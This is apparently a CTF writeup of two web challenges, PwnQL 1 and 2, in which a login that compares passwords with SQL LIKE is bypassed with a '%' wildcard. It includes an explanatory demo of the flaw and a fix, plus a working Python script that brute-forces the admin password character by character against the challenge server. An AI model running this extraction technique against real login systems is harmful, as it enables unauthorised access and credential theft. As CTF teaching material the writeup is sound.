HeroCTF v3 Writeup: PwnQL 1 & 2 (SQL Injection)

PwnQL 1 and 2 are web challenges worth 50 and 75 points respectively.

Website:

Let’s start by reading the source code:

Hmmm… login.php.bak? Let’s try to get the file:

We have to log in as admin to get the flag. To log in as admin, we have to make this query condition evaluate to true:

password LIKE :password;

They used LIKE to compare the input with the stored password, but this can easily be bypassed with SQL wildcard characters:

The “%” wildcard matches any sequence of characters, so it makes the LIKE comparison always true:
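To see why bound parameters alone do not help here, the following is an added example (not the challenge's PHP source or the author's code) that reproduces the LIKE-based check against a constructed in-memory SQLite table and contrasts it with a check that compares the full stored value in application code; the table, username and password are constructed for the demonstration.

```python
import hmac
import sqlite3

# Constructed stand-in for the challenge's users table; the real schema and
# password are not known from the writeup.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", "S3cretPassw0rd"))


def login_like(username, password):
    """Vulnerable check mirroring login.php.bak: the values are bound as
    parameters (no classic injection), but LIKE still interprets the
    '%' and '_' wildcards inside the user-supplied password."""
    row = conn.execute(
        "SELECT 1 FROM users WHERE username = :username "
        "AND password LIKE :password",
        {"username": username, "password": password},
    ).fetchone()
    return row is not None


def login_fixed(username, password):
    """Hardened check: look the user up by name only, then compare the whole
    secret in application code with a constant-time comparison. No LIKE, so
    '%' and '_' are ordinary characters and no prefix oracle exists.
    A real deployment compares against a password hash, not plaintext."""
    row = conn.execute(
        "SELECT password FROM users WHERE username = :username",
        {"username": username},
    ).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[0].encode(), password.encode())


if __name__ == "__main__":
    # Wildcard alone passes the LIKE check; a confirmed prefix plus '%'
    # also passes, which is the oracle the PwnQL 2 script relies on.
    print(login_like("admin", "%"))
    print(login_like("admin", "S3c%"))
    # The fixed check only accepts the exact stored value.
    print(login_fixed("admin", "%"))
    print(login_fixed("admin", "S3cretPassw0rd"))
```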

PwnQL #2:

The website is the same as in PwnQL 1, but here we have to find the password itself. Most of the work is already done: all we have to do is recover the flag character by character using “%”. I wrote a Python script to automate this process:

```python
import requests

url = "http://chall1.heroctf.fr:8080/index.php"
headers = {'Content-type': 'application/x-www-form-urlencoded', 'Accept': '*/*'}
# Note: '_' is itself a LIKE wildcard (matches any single character), so it
# also acts as a placeholder for characters outside this set.
possible_chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$_'


def get_password(username):
    print("Extracting password of " + username)
    password = ""
    while True:
        for c in possible_chars:
            # Guess one more character; '%' matches whatever follows it
            payload = "username=" + username + "&password=" + password + c + "%"
            pr = requests.post(url, data=payload, headers=headers)
            print(payload)
            if "flag" in pr.text:
                # Prefix confirmed: keep the character and go one position deeper
                password += c
                print(password)
                break
        else:
            # No character extended the prefix, so the password is complete
            password = password.replace("\\", "")
            print("Found password " + password + " for username " + username)
            return password


get_password("admin")
```

Output:

Thanks :) — Mudhalai Mr Team 1nf1n1ty

<>AKA Gowtham Student at SASTRA Deemed university, Core team member DSC SASTRA </>
